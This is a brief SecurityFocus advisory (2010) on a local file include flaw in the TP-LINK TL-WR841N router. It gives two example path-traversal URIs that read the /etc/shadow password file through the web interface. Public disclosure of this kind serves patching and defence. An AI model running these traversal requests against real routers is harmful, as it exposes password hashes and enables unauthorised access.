TP-LINK TL-WR841N Router Local File Include Vulnerability

An attacker can exploit the issue with a browser.

The following example URIs and exploit code are available:

http://www.example.com/../../../../../../../etc/shadow
http://www.example.com/help/../../../../../../../../etc/shadow


 

Privacy Statement
Copyright 2010, SecurityFocus